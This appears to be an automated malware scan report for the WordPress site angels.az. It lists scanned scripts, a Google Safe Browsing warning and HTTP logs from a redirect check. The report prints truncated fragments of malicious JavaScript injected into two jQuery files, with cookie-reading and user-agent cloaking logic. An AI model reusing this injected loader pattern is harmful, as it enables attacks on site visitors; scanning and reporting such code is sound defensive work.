Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=angels.az
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://angels.az/ | 200 OK Content-Length: 84006 Content-Type: text/html | clean |
http://angels.az/wp-includes/js/jquery/jquery.js | 200 OK Content-Length: 94140 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t jQuery.noConflict(); Antivirus reports:
| ||
http://angels.az/wp-includes/js/jquery/jquery-migrate.min.js | 200 OK Content-Length: 8255 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t Antivirus reports:
| ||
http://angels.az/wp-content/themes/wp-pravda/js/post-like.js | 200 OK Content-Length: 1537 Content-Type: text/javascript | clean |
http://angels.az/wp-content/themes/wp-pravda/js/superfish.js | 200 OK Content-Length: 4778 Content-Type: text/javascript | clean |
http://angels.az/wp-content/themes/wp-pravda/js/prettify.js | 200 OK Content-Length: 14687 Content-Type: text/javascript | clean |
http://angels.az/wp-content/themes/wp-pravda/js/retina.js | 200 OK Content-Length: 4827 Content-Type: text/javascript | clean |
http://angels.az/wp-content/themes/wp-pravda/js/scrolltopcontrol.js | 200 OK Content-Length: 4867 Content-Type: text/javascript | clean |
http://angels.az/wp-content/themes/wp-pravda/js/jquery.prettyphoto.js | 200 OK Content-Length: 23115 Content-Type: text/javascript | clean |
http://angels.az/wp-content/themes/wp-pravda/js/jquery.masonry.min.js | 200 OK Content-Length: 26052 Content-Type: text/javascript | clean |
http://angels.az/wp-content/themes/wp-pravda/js/jquery.infinitescroll.min.js | 200 OK Content-Length: 22313 Content-Type: text/javascript | clean |
http://angels.az/wp-content/themes/wp-pravda/js/jquery.imagesloaded.min.js | 200 OK Content-Length: 2102 Content-Type: text/javascript | clean |
http://angels.az/wp-content/themes/wp-pravda/js/bootstrap.js | 200 OK Content-Length: 29473 Content-Type: text/javascript | clean |
http://angels.az/wp-content/themes/wp-pravda/js/custom.js | 200 OK Content-Length: 3954 Content-Type: text/javascript | clean |
http://angels.az/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js | 200 OK Content-Length: 2076 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: angels.az
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 05 Oct 2014 15:21:28 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: wc_session_cookie_f8ec52d382ae0720a47c6bc552a5521c=Oz1EglSWoPobSWcVQfjqu4pqCa4TjaJg%7C%7C1412695289%7C%7C1412691689%7C%7Ccc4108d857f9146180366526c4cb39f0; expires=Tue, 07-Oct-2014 15:21:29 GMT; path=/; httponly
Set-Cookie: woocommerce_items_in_cart=0; expires=Sun, 05-Oct-2014 14:21:29 GMT; path=/
Set-Cookie: woocommerce_cart_hash=0; expires=Sun, 05-Oct-2014 14:21:29 GMT; path=/
X-Pingback: http://angels.az/xmlrpc.php
GET / HTTP/1.1
Host: angels.az
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 05 Oct 2014 15:21:28 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: wc_session_cookie_f8ec52d382ae0720a47c6bc552a5521c=Oz1EglSWoPobSWcVQfjqu4pqCa4TjaJg%7C%7C1412695289%7C%7C1412691689%7C%7Ccc4108d857f9146180366526c4cb39f0; expires=Tue, 07-Oct-2014 15:21:29 GMT; path=/; httponly
Set-Cookie: woocommerce_items_in_cart=0; expires=Sun, 05-Oct-2014 14:21:29 GMT; path=/
Set-Cookie: woocommerce_cart_hash=0; expires=Sun, 05-Oct-2014 14:21:29 GMT; path=/
X-Pingback: http://angels.az/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: angels.az
Referer: http://www.google.com/search?q=angels.az
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: angels.az
Referer: http://www.google.com/search?q=angels.az
Result:
The result is similar to the first query. There are no suspicious redirects found.